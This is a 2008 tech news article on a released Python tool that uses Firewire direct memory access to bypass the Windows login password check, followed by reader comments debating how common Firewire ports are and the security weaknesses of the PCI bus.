Print 53 comment(s) - last by lexluthermiest.. on Mar 14 at 3:11 PM

New Zealand hacker releases source code to utility that reads password directly from memory

Exploiting a little known feature built into Firewire port specifications, Adam Boileau released the source code to a utility authored in 2006 that allows anyone to bypass the Windows Authentication dialog box on any PC with a Firewire port.

The tool is a simple, 200-line script written in the Python programming language exploits features built into Firewire that allow direct access to a computer’s memory.  By targeting specific places that Windows consistently stores its vital authentication functions, Boileau’s tool is able to overwrite Windows’ secured code with patches that skip Windows’ password check entirely.

Boileau says he decided to release the script now, two years after it was initially unveiled, because Microsoft had not acted to patch the vulnerability. Boileau considers his tool a “party-trick demo script thats been lying around my [home folder] for two years gathering dust,” and considers it “a pity to write code and have no one use it.”

“Besides,” says Boileau, “according to Microsoft's definition, it never was a Security Vulnerability anyway – screensavers and login prompts are … about the Feeling of Security.”

Boileau also notes that he’s seen others successfully modify the script to hack Windows Vista’s password-check code, as well as use a laptop’s PCMCIA port to plug in a Firewire card and attack the laptop after Windows auto-installed the card’s drivers.

It’s important to note that Firewire’s provisions for direct memory access, called DMA, are useful in other contexts, like in the use of software debuggers. Nowadays, a sizable percentage of the world’s software checks for the presence of programs monitoring memory directly – which is what a debugger does – and will frequently act differently or refuse to start up if it detects their presence.

Firewire ports are therefore usable as high-speed debugging devices, allowing developers and hackers alike to passively monitor anywhere in a computer’s memory and make changes where needed, whether its reprogramming a password check or seeding buggy software with correct data. It might also allow forensic investigators to grab an encrypted hard drive’s decryption key directly from memory, while the computer is running.

Also important is that the same technique has been known to work on other operating systems, including Mac OS X and Linux – and in fact some people have used modified iPods to run Firewire DMA attacks on the fly.

Common security thought dictates that a computer is essentially lost if it is in your opponent’s possession, and that security on a physical machine will be subverted with time: for computers equipped with Firewire, the thought couldn’t be more true.

Comments     Threshold

This article is over a month old, voting and posting comments is disabled

Not a problem...
By Bonrock on 3/7/2008 10:47:36 PM , Rating: -1
On first glance, I thought this was a major vulnerability. Then I remembered that most computers don't have FireWire ports, because nobody uses that crap.

RE: Not a problem...
By napalmjack on 3/7/2008 11:13:21 PM , Rating: 2
Sure about that?

RE: Not a problem...
By ProviaFan on 3/7/2008 11:22:16 PM , Rating: 4
Anyone who works with digital audio or video knows that you are clueless.

RE: Not a problem...
By lexluthermiester on 3/14/2008 3:11:11 PM , Rating: 2
I don't use firewire and never will and I work with audio and video all the time. USB can be found on every machine sold today, were as firewire is not so wide spread.

RE: Not a problem...
By omnicronx on 3/7/2008 11:29:18 PM , Rating: 2
Many laptops include firewire.. I think every Mac includes one.

RE: Not a problem...
By Master Kenobi on 3/8/2008 12:01:07 AM , Rating: 2
All Mac's, Sony's, and many HP/Dell systems include a 4-pin firewire with desktop models possibly including a 6-pin port.

RE: Not a problem...
By JoshuaBuss on 3/8/2008 1:39:58 AM , Rating: 2
not the macbook air.. hehe

RE: Not a problem...
By omnicronx on 3/8/2008 1:19:46 PM , Rating: 2
Exactly, and this is why it should be a big concern. Looking at many workplaces, most people with a high positions have laptops. Think about the sensitive information that could be pulled without needing hardcore equipment.

RE: Not a problem...
By Ochophosphate on 3/8/2008 9:12:36 AM , Rating: 2
as well as use a laptop’s PCMCIA port to plug in a Firewire card and attack the laptop after Windows auto-installed the card’s drivers.

Even without an available firewire port, looks like they can just add their own. Sounding like more of a problem yet?

RE: Not a problem...
By Melted Rabbit on 3/8/2008 1:39:54 PM , Rating: 2
This is less of a flaw on the part of Apple and Firewire as much as a design flaw in the PCI standard which Intel designed. There is no way to fix this flaw with PCI easily, as the PCI standard has no kind of security system. By default, all PCI peripherals can have read/write access to the entire memory space of the computer. This exploit would be possible, but harder to do, with flash and an FPGA on a PCI card, and with no Firewire involved. Also systems with just PCI and those with PCI and PCI Express are both vulnerable to this exploit.

One workaround for Firewire is to let the Firewire bus access a smaller virtual address space instead of the entire actual address space of the computer. Then this particular attack could be avoided. The PowerMac G5 and Sun workstations fix the flaw in this way. I do not know for sure, but this would probably require quite a bit of reworking and extra logic for both the North Bridge and Memory Controller on an x86 PC to make this fix work. Intel would like to see Firewire dead, so don't expect this fix on an Intel chipset or processor, ever. AMD probably doesn't have the engineers to add a fix like this to their offerings.

The best solution for this problem with PCI is to come up with a new bus standard not software compatible with PCIe that has a security model. It should also address some of intentional shortcomings of PCIe, like being a peer to peer bus instead of the master-slave setup currently present in PCIe. It should also add the ability to route between nodes, which PCIe also cannot do. Intel intentionally left the last two mentioned features out to make a general purpose PC the only feasible option for computing instead of smaller, specialized computers being an option for a user.

RE: Not a problem...
By DragonMaster0 on 3/9/2008 8:29:09 PM , Rating: 2
I do not know for sure, but this would probably require quite a bit of reworking and extra logic for both the North Bridge and Memory Controller on an x86 PC to make this fix work.

I don't know any north bridges with on-chip firewire (maybe they do now, but I doubt). Firewire is connected to a separate controller(usually a VIA or TI) on the PCI bus, just like a network chip. These would need to block the RAM area in question.

Intel would like to see Firewire dead

Obviously, since it doesn't load the CPU...

"Mac OS X is like living in a farmhouse in the country with no locks, and Windows is living in a house with bars on the windows in the bad part of town." -- Charlie Miller

Copyright 2016 DailyTech LLC. - RSS Feed | Advertise | About Us | Ethics | FAQ | Terms, Conditions & Privacy Information | Kristopher Kubicki